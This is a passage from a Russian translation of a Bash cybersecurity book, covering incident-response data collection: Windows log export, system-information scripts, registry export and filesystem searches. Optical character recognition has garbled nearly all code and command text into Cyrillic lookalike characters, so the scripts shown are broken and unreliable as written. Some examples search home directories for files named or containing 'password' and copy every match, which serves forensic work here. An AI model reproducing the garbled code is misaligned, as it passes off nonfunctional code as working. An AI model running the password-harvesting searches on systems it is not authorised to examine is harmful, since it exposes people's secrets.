данной системы, в большинстве дистрибутивов Глпих обратитесь к файлам /еёс/ 
5у$108.сопф или /е*с/гзу$10о8.сопф. 


Собираем файлы журналов М/іпаомѕ 


В среде \/т4о\з команду меуиёі1 можно использовать для сбора лог-файлов 
и управления ими. К счастью, эта команда вызывается из СЁ Ваѕћ. Сценарий 
м1п1085$5 . И, показанный в примере 5.2, использует для вывода списка всех доступ- 
ных журналов параметр е1 команды меуїи+і1, а для экспорта каждого журнала 
в файл — параметр ер1. 


Пример 5.2. Сценарий \/п095.5Н 


#1! /61п/Ба$й - 

# 

ВазИ и кибербезопасность 
міп1065.5ћ 


Описание: 
Собираем копии файлов журнала Міпӣомѕ 


# 
# 
# 
# 
# 
# 
# Использование: 
# міп1085.5һ [-2] 
# -2 Заархивировать вывод 
# 
Т62=0 
іҒ (( %# > е )) © 
+һеп 
1 [[ ${1:0:2} == '-2' ]] ө 
Еһеп 
762=1 # флаг е2 для Фаг/71р-архивирования лог-файлов 
ЅһіҒТЕ 
#1 
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+1 
ЅҮЅМАМ=$ (Поз пате) 


ГОботв=${1 : - /тр/${5Ү5МАМ} 1085} © 
шка1г -р $.060ІК [4] 
са ${106рІК} || ехал -2 
меуёи&і1 е1 | мһі1е геаа А106 [5] 
ао 
АГОб="${АЕОб%$ '\г'}" [6] 
есһо "${АГОС}:" [2] 
ЅДЕМАМ="${АГОб// /_}" © 
ЅАЕМАМ="%{ ЅАЕМАМ/ /\//- }" 
меуёиі1 ер1 "ФАГОС" "${5ҮЅМАМ} ${ЅАЕМАМ}.еуёх" 
аопе 
14 (( 167 == 1 )) [9] 
ёһеп 
Фаг -с2уЕ ${5ҮЅМАМ} 1085.р2 *.еүіх П0] 
ғі 


© Сценарий начинается с простой инициализации и оператора 1+, который про- 
веряет, были ли предоставлены какие-либо аргументы. $# — это специальная 
переменная оболочки, значением которой является количество аргументов, пере- 
даваемых в командной строке при вызове скрипта. Это условие для 1+ из-за 
двойных скобок является арифметическим выражением, поэтому можно исполь- 
зовать символ «больше» (>) и выполнять численное сравнение. Если этот символ 
в выражении 1+ используется с квадратными скобками, а не с двойными, символ > 
выполняет лексическое сравнение — в алфавитном порядке. Для численного срав- 
нения необходимо добавить -* в квадратных скобках. 


Для этого сценария единственным аргументом, который мы поддерживаем, явля- 
ется -2, указывающий, что по окончании процесса все собранные файлы журналов 
должны быть сжаты в один файл ТАК. Это также означает, что мы можем исполь- 
зовать простой тип разбора аргументов. В следующем скрипте воспользуемся более 
сложным анализатором аргументов (вефор*$). 


Ө В ходе этой проверки, начиная с начала строки (смещение 0 байт) длиной 2 бай- 
та, принимается подстрока первого аргумента ($1). Если аргумент -2, то мы уста- 
новим флаг. Для удаления этого аргумента в сценарии выполняется сдвиг (5һіғ+). 
То, что ранее было вторым аргументом (и если таковой имелся), теперь становится 
первым. Третий (если таковой имеется) становится вторым и т. д. 


© Если пользователь хочет указать расположение журналов, это можно определить 
в качестве аргумента в сценарии. Необязательный аргумент -2, если он указан, 
уже был смещен, поэтому любой пользовательский путь теперь станет первым 
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аргументом. Если в командной строке не было указано никакого значения, вы- 
ражение внутри фигурных скобок вернет значение по умолчанию. Значение по 
умолчанию указывается справа от знака минус. Мы используем фигурные скобки 
вокруг 5ҮЅТЕМ, потому что _108$ в противном случае считался бы частью имени 
переменной. 


Ө Добавление параметра -р для команды тка1г приводит к созданию всех указан- 
ных каталогов. Сообщение об ошибке не будет выдано, даже если такой каталог 
уже существует. В следующей строке мы вызываем команду са, чтобы перейти 
в созданный каталог и сделать его текущим, где будут сохранены файлы журна- 
ла. Если команда са не будет выполнена, программа завершит работу, выдав код 
ошибки. 


© Здесь мы вызываем команду меуёи11 е1, чтобы перечислить все возможные 
файлы журнала. Вывод передается в цикл мһі1е, который за раз будет читать одну 
строку (одно имя файла журнала). 


© Поскольку этот скрипт выполняется в системе УЛ п4о\уз, каждая строка, на- 
печатанная ме\у{и{11, заканчивается символом новой строки (\п) и символом 
возврата (\г). Мы удаляем символ из правой части строки с помощью оператора %. 
Чтобы указать (непечатаемый) возвращаемый символ, мы используем конструк- 
цию $ ' 571 п8', которая заменяет произвольные символы обратного слеша непе- 
чатаемыми символами (как определено в стандарте АМЗГ С). Таким образом, два 
символа \г заменяются возвращаемым символом АЗСП 13. 


Ө Здесь мы повторяем имя файла, чтобы указать пользователю на ход выполнения 
процесса и напомнить, какой журнал в настоящее время извлекается. 


Ө Чтобы задать имя файла, в котором меуёи+і1 должен сохранить свой вывод 
(файл журнала), мы делаем два изменения в имени. Во-первых, поскольку имя 
журнала, как указано, может иметь пробелы, заменяем любой пробел символом 
подчеркивания. Хотя это и не обязательно, подчеркивание позволяет избежать 
необходимости ставить кавычки при использовании имени файла. В общем случае 
синтаксис для получения значения ХАК с заменой о1а на пем будет следующим: 
${\ЕВУ/о19/пем}. Используя двойной слеш, ${\АВ//о19/пем}, мы проводим замену 
всех вхождений, а не только первого. 


Распространенной ошибкой будет вариант ${МАВ/о!4/пем//}. Конечный слеш 
не является частью синтаксиса, и, если будет выполнена подстановка, он просто 
окажется добавлен в результирующую строку. Например, если МУАВ=етБоаеп, 
то ${\/АВ/о!4/пем/} вернет етЬпем/еп. 
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Во-вторых, у некоторых файлов журнала \/п4о\з символ / есть в имени. В Баѕћ, 
однако, при указании пути к файлу / выступает разделителем между каталогами. 
Его не следует указывать в имени файла, поэтому мы, используя синтаксис ${МАВ/ 
о1а/пем}, делаем другую замену, чтобы заменить любой символ / символом -. Од- 
нако обратите внимание, что мы должны избегать значения /, чтобы Баѕћ не считал 
слеш частью синтаксиса замены. Для указания того, что мы хотим именно слеш, 
добавляем \/. 


© Это еще одно арифметическое выражение, заключенное в двойные скобки. 
В таких выражениях Баѕһ не требует наличия символа $ перед большинством имен 
переменных. Символ $ потребуется для позиционных параметров, таких как $1, 
которые позволят избежать путаницы с числом 1. 


© Здесь, чтобы собрать все файлы .еуїх в один архив, мы используем команду +аг. 
Для сжатия данных указываем параметр -2, но не добавляем -у, чтобы +аг выпол- 
няла свою работу без вывода сообщений (поскольку наш скрипт уже отображал 
имена файлов при их извлечении). 


Сценарий выполняется в подоболочке, поэтому, хотя мы изменили каталоги внутри 
сценария, после выхода из сценария мы вернулись в каталог, с которого начали. 
Если бы нам нужно было вернуться в исходный каталог внутри скрипта, мы мо- 
гли бы использовать команду са -, которая вернула бы нас в предыдущий каталог. 


Сбор информации о системе 


Если вы можете произвольно выполнять команды в системе, для сбора различной 
информации о ней следует задействовать стандартные команды ОС. Конкретные 
команды, которые вы используете, зависят от вашей операционной системы. 
Таблица 5.3 содержит общие команды, которые могут дать много информации о си- 
стеме. Обратите внимание, что в зависимости от того, в какой системе выполняется 
команда — Глпах или Міпаоуѕ, команды могут различаться. 


Таблица 5.3. Локальные команды сбора данных 


Команда Ипих | Эквивалент М/іпаомѕ Сі Ва$Н | Назначение 


ипатше -а ипаше -а Показать информацию о версии 
операционной системы 

саё /ргос/ ѕуѕёегтіпѓо Вывести сведения о системном 

сршпѓо оборудовании и связанную информацию 

Исопйв ірсопће Вывести информацию о сетевом 


интерфейсе 
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Команда Ипих | Эквивалент Міпаомѕ СЁ Ваѕћ | Назначение 

тоще тоще ргіпё Показать таблицу маршрутизации 

агр -а агр -а Вывести таблицу АКР (протокол 
определения адреса) 

пеіѕќаё -а пеіѕѓаё -а Отобразить сетевые подключения 

топ пе ѕһаге Вывести информацию о файловых 
системах 

рѕ -е Саѕк1іѕС Отобразить запущенные процессы 


Сценарий ре*1оса1 . ѕћ, показанный в примере 5.3, предназначен для определения 
типа операционной системы, запуска различных команд, соответствующих типу 
ОС, и записи результатов в файл. Вывод каждой команды хранится в формате ХМІ, 
то есть для упрощения последующей обработки ограничен тегами ХМІ. Вызовите 
скрипт следующим образом: БазИ веё1оса1. $И < стіѕ.їх, где файл стаѕ. хе содер- 
жит список команд, аналогичных приведенным в табл. 5.3. Ожидаемый формат — 
это поля, разделенные вертикальными линиями, плюс дополнительное поле — тег 
ХМГ, с помощью которого можно пометить вывод команды (кроме того, строки, 
начинающиеся с #, считаются комментариями и будут игнорироваться). 


Вот как может выглядеть файл стаѕ.+хі: 


# ііпих Соттапа |М5иЯп Ваѕһ 
Ф---------------- Ф+------------ 
ипате -а [ипате -а 

са /ргос/сри1по | ѕуѕ&етіпҒо 
іҒсопғів [ірсоп+ів 
гоие [гоиъе ргіпё 
агр -а [агр -а 
пеёѕ+аё -а [пеёѕёаё -а 
тоипЁ [пе ѕһағе 

рѕ -е [ёаѕк115+ 


ХМЕ ав 
ипате 
ѕуѕіп+о 
пміпёегғҒасе 
пмгоиТе 
пмагр 
пеёѕ+аї 
аіѕкіп+о 
ргосеѕѕеѕ 


Ригрозе 

0.5. мегѕіоп ес 

ѕуѕ+ет Пагамаге апа ге1афеЯ іпҒо 
Мемогк іпёег+Ғасе іпҒогта+іоп 
гоиёіпе фаБ1е 

АВР +аб1е 

пефмогКк соппесЕ1оп$ 

поипфед 41$К$ 

гиппіпе ргосеѕѕеѕ 


Пример 5.3 показывает исходный код для скрипта. 


Пример 5.3. дейосаі.5ћ 


#1/6ріп/Баѕћ - 
# 


Ваѕһ и кибербезопасность 


веїт1оса1.ѕһћ 


Собираем основную информацию о системе и сбрасываем в файл 


# 
# 
# 
# Описание: 
# 
# 
# 


Использование: 
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# баѕһ веф1оса1.$5Н < стаѕ.іхі 
# стаѕ.хё — это файл со списком команд для выполнения 
# 


# ЅерСтаѕ - отделение команд от строки ввода 
Ғипсбіоп ЅерСтаѕ () 
{ 

СМ0=${АГІМЕЯЯ | *} 

ВЕЗТ=${ АЕТМЕ#* | } 

МСМО=${ВЕ$Т%% | *} 

ВЕЗТ=${ВЕЗТ#* | } 

ТАб=${ВЕ$Т%% | *} 


Ө еее 


14 [[ $0$ТУРЕ == "М$ИЯп" ]] 
{Веп 
СМо="ФиСМО" 
е1ѕе 
Смр="$_СМ0" 
+1 
} 


ФипсЕ1оп ритрІпғо () 

{ (5) 
ргіпЕҒ '<ѕуѕёетіпҒо һоѕ&="%5" фуре="%$"' "ФНОЅТМАМЕ" "$0$ТУРЕ" 
рг1пЕЕ ' аате="%5" +іте="%5">\п' "$(дафе '+%Е')" "$(4афе '+%Тт')" 
геадаггау СМО$ 


Ғог АШІМЕ іп "${См05[0]}" [2] 
ао 
# игнорировать комментарии 
14 [[ ${АЕТМЕ: 0:1} == '#' ]] ; +һеп сопёіпие ; +1 [8] 
ЅерСтаѕ 
а [[ %{СМ0:0:3} == М№А ]] [9] 
©һеп 
сопёіпие 
е15е 
ргіпЕ "<%5>\п" $ТАб По] 
$Смр 
ргіпЕя "</%5>\п" $ТАб 
+1 
аопе 
ргіпҒ "</ѕуѕёеміпҒо>\п" 
} 
ОЅТҮРЕ=$ ( . /оѕӣеёес+.ѕһ) [1] 
НОЅТМ№ММ=%$ (поз паме) [2] 
ТМРЕІІЕ="${НОЅТММ} .іп+о" © 


# собрать в їтр-файл как информацию, так и ошибки 
ритрІпҒо > $ТМРЕТЬЕ 2>81 [4] 
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© После двух определений функций сценарий начинается вызовом нашего скрипта 
оздефесе.5Н (из главы 2). В качестве местоположения сценария оѕӣеќесё.5ћ мы 
указали текущий каталог. Вы можете поместить файл в другое место, но затем 
обязательно измените заданный путь с . /, указав тот адрес, по которому находится 
данный сценарий, и/или добавьте это местоположение в переменную РАТН. 


Чтобы сделать работу более эффективной, можете включить сценарий оѕеїесі.ѕћ 
непосредственно в дейосаі!.5ћ. 


Ө Затем мы запускаем программу һоѕёпате в подоболочке, чтобы получить имя 
этой системы для использования в следующей строке, а позже — в функции 
РитрІп+о. 


Ө Мы используем имя хоста как часть временного имени файла, в который мы 
поместим весь наш вывод. 


Ө Здесь мы вызываем функцию, которая будет выполнять большую часть работы 
этого скрипта. При вызове функции мы перенаправляем и $&4ои%, и $64егг в один 
и тот же файл, чтобы функция не устанавливала перенаправление ни на один из 
своих выходных операторов; функция может вносить записи в ѕйои+, и при необ- 
ходимости этот вызов перенаправит весь вывод. Другой способ выполнить пере- 
направление — поместить его перед закрывающей скобкой определения функции 
ОитрІп+о. Вместо этого перенаправление ѕќіои может быть оставлено на усмотре- 
ние пользователя, вызывающего скрипт; по умолчанию же все будет записываться 
в $64оиё. Но если пользователь хочет, чтобы вывод отправлялся в файл, ему нужно 
создать файл с именем ќетр+і1е и помнить, что ѕійегг перенаправляется именно 
в него. Наш пример рассчитан на менее опытных пользователей. 


Ө Здесь начинается самая важная часть сценария. Начало функции — вывод 
ХМГ-тега <ѕуѕетіп+о>, который будет иметь свой закрывающий тег, записанный 
в конце этой функции. 


© Команда геадаггау в Баѕһ будет читать все строки ввода (до конца читаемого 
файла или при нажатии сочетания клавиш С +0). Каждая строка будет отдельно 
записана в массив, в данном случае СМ05. 


Ө Гог зацикливает значения массива СМ05 — по одной строке за один проход. 


Ө В этой строке используется операция подстроки, чтобы извлечь из переменной 
АЕТМЕ символ в позиции 0 длины 1. Хештег (#) заключен в кавычки, чтобы оболочка 
не интерпретировала его как начало комментария скрипта. 
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Если строка не является комментарием, скрипт вызовет функцию Ѕерстаѕ. Подроб- 
нее о ней мы расскажем позже; она разделяет строку ввода на СМр и ТАС, где СМО 
будет подходящей командой для системы Глпих или Міпао%ѕ, в зависимости от 
того, в какой системе мы запускаем скрипт. 


© Здесь опять же мы используем операцию подстроки с начала строки (позиция 0) 
длины 3, чтобы найти строку, которая указывает, что в этой конкретной операци- 
онной системе для данной информации нет соответствующей операции. Оператор 
соп1пие указывает БазВ перейти к следующей итерации цикла. 


© Если необходимо выполнить соответствующие действия, в этом разделе кода 
по обе стороны от вызова команды будет напечатан заданный ХМІ-тег. Обратите 
внимание, что мы вызываем команду, получая значение переменной СМР. 


Ф Здесь мы изолируем команду Піпих от строки нашего входного файла, удаляя 
все символы справа от вертикальной черты, включая саму строку. Символы %% 
указывают, что самое длинное совпадение возможно в правой части значения 
переменной и нужно удалить его из возвращаемого значения (то есть АІІМЕ не из- 
меняется). 


Ф Добавив символ #, мы удаляем самое короткое совпадение слева от значения 
переменной. Таким образом, удаляется команда Глпих, которая была только что 
помещена в Е СМБ. 


Ф Опять же мы удаляем все, что находится справа от вертикальной черты, но на 
этот раз работаем с ВЕЗТ, измененным в предыдущем выражении. Здесь мы полу- 
чаем команду МЅ5/іпӣомѕ. 


Ф В этих строках мы извлекаем тег ХМГ, с помощью тех же операций замещения, 
которые уже дважды рассматривали. 


Все, что осталось в этой функции, — решить, основываясь на типе операционной 
системы, какое значение возвращать в СМ. Все переменные являются глобальными, 
если они явно не объявлены в функции как локальные. Ни одна из переменных 
не является локальной, поэтому их можно использовать (устанавливать, изменять) 
по всему сценарию. 


При запуске данного сценария, как уже было показано ранее, вы можете исполь- 
зовать файл стӣѕ .хї или изменить его значения, чтобы получить необходимую 
вам информацию. Вы также можете запустить его, не перенаправляя ввод из 
файла. Просто введите (или скопируйте/вставьте) входные данные после вызова 
сценария. 
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Сбор данных о реестре М/іпаоуѕ 


Реестр Міпаооѕ — это обширное хранилище настроек, определяющих поведение 
системы и приложений. Некоторые значения разделов реестра часто можно ис- 
пользовать для выявления наличия вредоносных программ и различных видов 
вторжений. Таким образом, при последующем выполнении анализа системы вам 
может быть полезна копия реестра. 


Чтобы с помощью СЁ Ваѕћ экспортировать весь реестр \тп4о\з в файл, выполните 
следующую команду: 


гереаі //Е ${НОЅТМАМЕ}_ гере. бак 


Обратите внимание: так как мы вызываем гевеаії из Сіс ВазВ, перед параметром Е 
стоят два слеша; при использовании командной строки Міпіо%ѕ вам потребуется 
только один слеш. Чтобы упростить организацию, укажем ${ НОЅТМАМЕ} как часть 
имени файла вывода. 


При необходимости команду гев также можно использовать для экспорта разделов 
реестра или отдельных подразделов. Чтобы с помощью СИВазЬ экспортировать 
куст НКЕҮ ГОСАІ_МАСНІМЕ, введите следующее: 


гер ехрогЕ НКЕҮ ОСА _МАСНІМЕ $ (НОЗТМАМЕ ) ћк1т.бак 


Поиск в файловой системе 


Возможность поиска в системе крайне важна: он нужен как при организации 
файлов, так и при реагировании на инциденты и криминалистической экспер- 
тизе. Для выполнения различных функций поиска служат чрезвычайно мощные 
команды Ғіпа и вгер. 


Поиск по имени файла 


Поиск по имени файла — один из основных методов поиска. Он удобен, если известно 
точное имя файла или часть имени. В Піпих для поиска в каталоге /поте и его подка- 
талогах имен файлов, содержащих слово раѕѕмога, выполните следующую команду: 


Ғіпа /һоте -пате ' *раѕѕмоғга* ' 


Обратите внимание, что символ * в начале и в конце строки поиска обозначает 
подстановочный знак, который будет соответствовать любым символам или их 
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отсутствию. Это шаблон оболочки, отличающийся от регулярного выражения. 
Кроме того, вы можете вместо опции -пате использовать -іпате, чтобы сделать 
поиск нечувствительным к регистру. 


Чтобы выполнить такой поиск с помощью СЁ ВазВ в системе Міпаоуѕ, просто 
замените /һоте на /с/Оѕегѕ. 


Если при использовании команды Ёпа вы хотите блокировать ошибки, такие 
как Регтіѕѕіоп Бетеа, можете сделать это, перенаправив ѕійегг в /аеу/пиії или 
в файл журнала: 


Ғіпа /һоте -пате '*раз5мога*' 2>/4еу/пи11 


Поиск скрытых файлов 


Скрытые файлы могут заинтересовать нас, так как они нередко используются 
людьми или вредоносными программами, которые хотят избежать обнаружения. 
В Ппих имена скрытых файлов начинаются с точки. Чтобы найти скрытые файлы 
в каталоге /һоте и его подкаталогах, введите следующее: 


Ғіпа /поте -паме '.*' 


Символы .* в предыдущем примере — это шаблон оболочки, который отличается 
от регулярного выражения. В контексте поиска шаблон «точка — звездочка» будет 
соответствовать любому файлу, который начинается с точки и сопровождается 
любым количеством дополнительных символов (обозначается подстановочным 
знаком *). 


В УЛп4о\$ скрытые файлы обозначаются атрибутом, а не именем файла. В команд- 
ной строке Ұіпаоуѕ вы можете следующим образом определить находящиеся на 
диске с: \ скрытые файлы: 


аіг с:\ /5 /А:Н 


Параметр /5 указывает команде 41г рекурсивно обходить подкаталоги, а /А:Н 
говорит вывести файлы с атрибутом, обозначающим, что этот файл — скрытый. 
Си Ваѕћ, к сожалению, перехватывает команду а1г и выполняет вместо нее коман- 
ду 15. А это означает, что команду а1г нельзя просто так запустить из Баз. Такой 
поиск можно выполнить с помощью команды #іпа и параметра -ехес в сочетании 
с командой аёёгір в \/шао\5. 


Глава 5. Сбор информации 83 


Команда +1п4 может запускать конкретную команду для каждого найденного 
файла. Для этого вы можете добавить опцию -ехес, задав критерии поиска. Она 
заменяет любые фигурные скобки ({}) на найденный путь к файлу. Точка с запятой 
завершает выражение команды: 


$ Ғіпа /с -ехес афёгір '{}' \; | евгер '^.{4}н.*' 


А н С: \У5ег5\ВоБ\$сг1рЕ$\Н1$%. Ех 
А НВ С: \У5ег5\ВоБ\$сг1рЕ$\м1п108$ .5$И 


Команда +114 выполнит команду аёёгір для каждого файла, который идентифици- 
рует на диске С:\ (обозначается как /с), напечатав, таким образом, атрибуты для 
файла. Далее, для идентификации строк с регулярным выражением используется 
команда ергер, где пятый символ — это буква Н, что соответствует скрытому атри- 


буту файла (м44еп). 

Если вы хотите еще больше очистить вывод и вывести только путь к файлу, можете 
сделать это, отправив вывод евгер в команду сиё: 

$ Ғіпа . -ехес атёгір '{}' \; | ергер '^.{4}Н.*' | сиё -с22- 


С: \Оѕегѕ\Воб\ѕсгіреѕ\ћіѕі.хі 
С: \Оѕегѕ\Воб\ѕсгірЕѕ\міп1065.5ћ 


Параметр -с указывает сиё номера позиций символов, которые будут использованы 
для разбиения; 22- указывает, что сокращение начинается с символа 22, который 
является началом пути к файлу, и продолжается до конца строки (символ -). 
Это может пригодиться, если вы хотите передать путь к файлу в другую команду 
для дальнейшей обработки. 


Поиск по размеру файла 


Параметр -$12е команды #іпа можно использовать для поиска файлов по их раз- 
меру. Это может быть полезно для определения особенно больших файлов или 
самых больших или самых маленьких файлов в системе. 


Для поиска в каталоге /поте и его подкаталогах файлов размером более 5 Гбайт 
выполните следующую команду: 


Ғіпа /һоме -ѕіғе +56 


Чтобы определить самые большие файлы в системе, вы можете комбинировать 
Ғіпа с несколькими другими командами: 


Ғіпа / -+уре + -ехес 15 -5 '{}' \; | ѕоге -п -г | Һеаа -5 
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Сначала мы, чтобы вывести список всех файлов в корневом каталоге, используем 
команду +1п4 / -+уре +. Каждый файл прогоняется через команду 1$ -$, которая 
определяет его размер в блоках (не в байтах). Затем список сортируется по убыва- 
нию, а первые пять строк отображаются с помощью команды һеаа. Чтобы увидеть 
самые маленькие файлы в системе, вместо һеаа можно использовать +а11 или 
удалить параметр -г из сортировки. 


В оболочке для представления последней выполненной команды вы можете 
добавить символы !!. Эти символы могут быть использованы для повторного 
выполнения команды или ее включения в конвейер команд. Предположим, что 
вы только что выполнили следующую команду: 


Ғіпа / -+уре + -ехес 15 -5 '{}' \; 

Затем, чтобы снова запустить ее или передать в конвейер, вы можете исполь- 
зовать символы !!: 

1! | $0гЕ -п -г | Һеаа -5 


Оболочка автоматически заменит символы !! последней командой, которая была 
выполнена. Можете сами попробовать! 


Чтобы найти самый большой файл, не задействуя команду +1та, вы можете ис- 
пользовать команду 1$ напрямую, что более эффективно. Для выполнения такого 
поиска просто добавьте для команды 1$ параметр -В, который заставит ее рекур- 
сивно перечислять файлы в указанном каталоге: 


15 / -В -5 | $0Г% -п -г | Неа -5 


Поиск по времени 


Вы также можете выполнить поиск файлов в файловой системе по такому показа- 
телю, как последнее обращение к файлам или их последнее изменение. Такой поиск 
может быть полезен при расследовании инцидентов и для выявления последних 
действий системы. Поиск по времени может также пригодиться для анализа вредо- 
носных программ. С его помощью можно идентифицировать файлы, которые были 
доступны или изменены во время выполнения вредоносной программы. 


Для поиска в каталоге /поме и подкаталогах файлов, измененных менее пяти минут 
назад, выполните команду: 


Ғіпа /поте -ттіп -5 


Для поиска файлов, измененных менее 24 часов назад: 


Ғіпа /поте -тёіте -1 
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Число, указанное в параметре тёіте, кратно 24 часам, поэтому 1 означает 24 часа, 
2 означает 48 часов и т. д. Отрицательное число здесь означает «меньше» указанно- 
го числа, положительное число означает «больше», а точное соблюдение временных 
параметров можно задать, если не устанавливать никаких знаков перед значением. 


Для поиска файлов, измененных более двух дней (48 часов) назад, введите: 


Ғіпа /һоме -тЕ1те +2 


Для поиска файлов, доступ к которым был получен менее 24 часов назад, исполь- 
зуйте параметр -аёіте: 


Ғіпа /һоме -аёіте -1 


Для поиска в каталоге /һоте файлов, доступных менее 24 часов назад, и копиро- 
вания (ср) каждого файла в текущий рабочий каталог (./), введите следующее: 


Ғіпа /һоте -уре Е -а{1те -1 -ехес ср '{}' ./ \; 


Параметр -+уре + указывает, чтобы команда +1па искала соответствие только обыч- 
ным файлам, игнорируя каталоги и другие специальные типы файлов. Вы также 
можете скопировать файлы в любой каталог по вашему выбору, заменив его на ./ 
с абсолютным или относительным путем. 


Убедитесь, что ваш текущий рабочий каталог не находится где-то в иерархии /Ноте, 
иначе копии будут найдены и повторно скопированы. 


Поиск контента 


Команду вгер можно использовать для поиска файлов по их содержимому. Для по- 
иска в каталоге /һоте и подкаталогах файлов, содержащих строку раѕѕмога, вы- 
полните следующую команду: 


5гер -1 -г /һоте -е 'ра$$мога" 
Параметр -г рекурсивно выполняет поиск во всех каталогах, вложенных в каталог 


/поте, параметр -1 задает поиск без учета регистра, а параметр -е определяет строку 
шаблона регулярного выражения для поиска. 


Параметр -п можно использовать для определения того, какая строка в файле 
содержит строку поиска, а параметр -м — для сопоставления только целых слов. 
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Вы можете комбинировать команду вгер с командой +1па для простого копи- 
рования соответствующих файлов в ваш текущий рабочий каталог (или любой 
указанный каталог): 


Ғіпа /һоте -+уре + -ехес вгер 'раззмога’' '{}' \; -ехес ср '{}'. \; 


Во-первых, мы используем #іпа /һоте/ -уре +, чтобы идентифицировать все файлы 
в каталоге /һоте и во всех остальных каталогах, вложенных в /һоте. Каждый най- 
денный файл проверяется вгер с целью поиска слова раѕѕмога в его содержимом. 
Каждый файл, соответствующий критериям вгер, затем передается команде ср, 
чтобы скопировать найденный файл в текущий каталог (обозначенный точкой). 
Выполнение такой комбинации команд может занять довольно продолжительное 
время, поэтому лучше запускать ее в виде фоновой задачи. 


Поиск по типу файла 


Поиск в системе определенных типов файлов — довольно сложная задача. Нельзя 
полагаться на расширение файла: оно может вообще отсутствовать, например, если 
пользователь его умышленно удалил. К счастью, команда #і1е способна помочь 
идентифицировать типы файлов, сравнивая их содержимое с известными шабло- 
нами, называемыми магическими числами. В табл. 5.4 перечислены популярные 
магические числа и их начальные местоположения в файлах. 


Таблица 5.4. Магические числа 


Тип файла Шаблон магического числа | Шаблон магического | Смещение 
(шестнадцатеричный) числа (А$С1Т) файла (байт) 

ЈРЕС ЕЕ 08 ЕЕ РВ УОУЦ 0 

Исполняемый ООЅ |4р 5А М1 0 

Исполняемый ТЕ 45 4С 46 ЕГЕ 0 

и связываемый 

формат 

71Р-файл 50 4В 03 04 РК. 0 


Для начала вам нужно определить тип файла, для которого вы хотите выполнить 
поиск. Предположим, нужно найти в системе все файлы изображений формата 
РМС. Для этого сначала нужно взять файл, который не был изменен, например 
ТіЄє1е. рпе, запустить его с помощью команды +11е и проверить результат: 


$ Ғі1е Т11е.рп8 


Т1{1е.рпё: РМ№ б ітаре Чафа, 366 х 84, 8-рії/со1ог ВСВА, поп-іпёег1асеа 
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Как и ожидалось, +11е идентифицирует файл тіё1е.рпе, который действительно 
не был изменен, как изображение Р№С, а также предоставляет его размеры и раз- 
личные другие атрибуты. Основываясь на этой информации, вам необходимо 
определить, какую часть вывода команды #і1е использовать для поиска, и сгенери- 
ровать соответствующее регулярное выражение. Во многих случаях, например при 
криминалистической экспертизе, вам, вероятно, лучше собирать как можно больше 
информации — в дальнейшем вы всегда сможете дополнительно отфильтровать 
данные. Для этого вы будете использовать расширенное регулярное выражение, 
которое будет просто искать слово РМС в выводе команды +11е 'Р№_'. 


Конечно, для идентификации конкретных файлов вы можете создавать более 
сложные регулярные выражения. Например, если вы хотите найти РМС-файлы 
размером 100 х 100, выполните следующую команду: 


"РМ№С.*100х100' 


Если хотите найти файлы РМС и ЈРЕС: 
" (РМ№С | ЈРЕС)' 


Получив регулярное выражение, вы можете написать скрипт, запускающий коман- 
ду Ғі1е, которая будет искать совпадение для каждого файла в системе. Когда 
совпадение будет найдено, сценарий +уреѕеагсһ. ѕһ, показанный в примере 5.4, 
перенаправит путь к файлу в стандартный вывод. 


Пример 5.4. Сценарий ќуреѕеагсћ.ѕћ 
#1/6іп/Баѕћ - 


# 

# Ваѕһ и кибербезопасность 

# +уреѕеагсһ. ѕһ 

# 

# Описание: 

# Поиск в файловой системе файлов указанного типа. 

# Выводим путь, когда найдем. 

# 

# Использование: 

# +уреѕеагсһ.ѕһ [-с аїг] [-1] [-В|г] <раёегп> <ра+һ> 
#  -с Копировать найденные файлы в каталог 

# — -1 Игнорировать регистр 

# -В|г Рекурсивный поиск подкаталогов 

#  ‹ракеегпт> Шаблон типа файла для поиска 

# «раһ» Путь для начала поиска 

# 

РЕЕРОВМОТ=" -тмахаӢер&һћ 1" # только текущий каталог; по умолчанию 


# анализ аргументов опции: 
мһі1е вреёорїѕ 'с:ігЕ' ор; ао Ф 


88 Часть П • Защитные операции с использованием Ббаѕћ 


саѕе "${орі}" іп [2] 
с) # копировать найденные файлы в указанный каталог 
СОРҮ=ҮЕЅ 
ОЕЅТОІК="$ОРТАКС" (3] 


5; 
1) # игнорировать регистр при поиске 
САЗЕМАТСН= ' -1' 


РЕЈ 
[Вг]) # рекурсивно [4] 
ипѕеё РЕЕРОКМОТ; ; [5] 
*) # неизвестный/неподдерживаемый вариант ө 
# при получении ошибки теѕе от ргеёорѕ просто выйти 
ехії 2 ;; 
еѕас 
опе 
ЅҺіҒЕ Ф((ОРТІМО - 1)) [7] 
РАТТЕВМ=${1:-РОЕ доситепї} © 
$ТАКТОТВ=${2:-.} # по умолчанию начать здесь 


Ғіпа $5ТАВТОТВ ФОЕЕРОВМОТ -+уре + | мһі1е геаа ЕМ Ө 


ао 
+11е $ЕМ | ергер -а ФСАЅЕМАТСН "ФРАТТЕКМ" © 
14 (($? == 0 )) # найден один Ф 
©ћеп 
есһо $ЕМ№ 
іҒ [[ $С0РУ ]] Ф 
ёһеп 
ср -р ФЕМ $ОЕЗТОТВ Ф 
1 
+1 
аопе 


© Этот сценарий поддерживает параметры, которые, как описано во вступительных 
комментариях, изменяют его поведение. Сценарий должен проанализировать все эти 
параметры, чтобы определить, какие из них были предоставлены, а какие — опуще- 
ны. Если параметров больше двух, имеет смысл использовать встроенную оболочку 
Беїоріѕ. С помощью цикла мһі1е мы будем продолжать вызывать 5ефорф$ до тех 
пор, пока она не вернет ненулевое значение, сообщая нам, что параметров больше 
нет. Параметры, которые мы хотим найти, представлены в строке с:1гВ. Какой бы 
параметр ни был найден, в ор+ будет возвращено указанное нами имя переменной. 


Ө Здесь мы используем оператор саѕе, который является многопрофильной веткой; 
будет найдена ветвь, соответствующая шаблону, заданному перед левой круглой 
скобкой. Мы могли бы использовать конструкцию 1+/е11+/е15е, но ветвь и так 
хорошо читается и показывает все параметры. 


Ө Параметр с сопровождается двоеточием (:), находящимся в списке поддерживае- 
мых опций, — оно указывает вефор*$, что пользователь также предоставит аргумент 
для этого параметра. В нашем сценарии этот необязательный аргумент является 
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каталогом, в котором будут создаваться копии. Когда команда вефор*$ анализирует 
параметр с указанным выше аргументом, она помещает данный параметр в пере- 
менную с именем ОРТАКС, а сохраняет в БЕЗТОТВ, так как при следующем вызове 
Беїорїѕ переменная ОРТАВб может быть изменена. 


Ө Сценарий позволяет указывать в этом параметре прописную букву К или строч- 
ную г. Операторы сазе задают образец для сопоставления, а не просто литерал. 
Поэтому для данного случая мы написали [Ае]), используя конструкцию скобок, 
указывающих, что любая буква считается совпадением. 


